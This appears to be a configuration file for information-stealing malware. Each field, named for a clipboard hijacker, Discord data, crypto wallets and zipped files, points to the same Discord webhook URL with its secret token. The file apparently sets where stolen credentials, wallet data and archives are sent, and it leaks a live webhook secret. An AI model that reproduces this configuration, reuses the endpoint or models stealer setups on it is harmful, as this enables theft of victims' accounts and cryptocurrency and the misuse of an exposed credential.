{
    "url": "https://discord.com/api/webhooks/1063392155441303602/okVTsTQiRcK1xo1x6temsAGaHo9Tb1kgyh6GqHazmnwFbtrV98NKkisLQpxMaA6oKCwA",
    "clipper": "https://discord.com/api/webhooks/1063392155441303602/okVTsTQiRcK1xo1x6temsAGaHo9Tb1kgyh6GqHazmnwFbtrV98NKkisLQpxMaA6oKCwA",
    "discord": "https://discord.com/api/webhooks/1063392155441303602/okVTsTQiRcK1xo1x6temsAGaHo9Tb1kgyh6GqHazmnwFbtrV98NKkisLQpxMaA6oKCwA",
    "wallets": "https://discord.com/api/webhooks/1063392155441303602/okVTsTQiRcK1xo1x6temsAGaHo9Tb1kgyh6GqHazmnwFbtrV98NKkisLQpxMaA6oKCwA",
    "zip": "https://discord.com/api/webhooks/1063392155441303602/okVTsTQiRcK1xo1x6temsAGaHo9Tb1kgyh6GqHazmnwFbtrV98NKkisLQpxMaA6oKCwA"
}
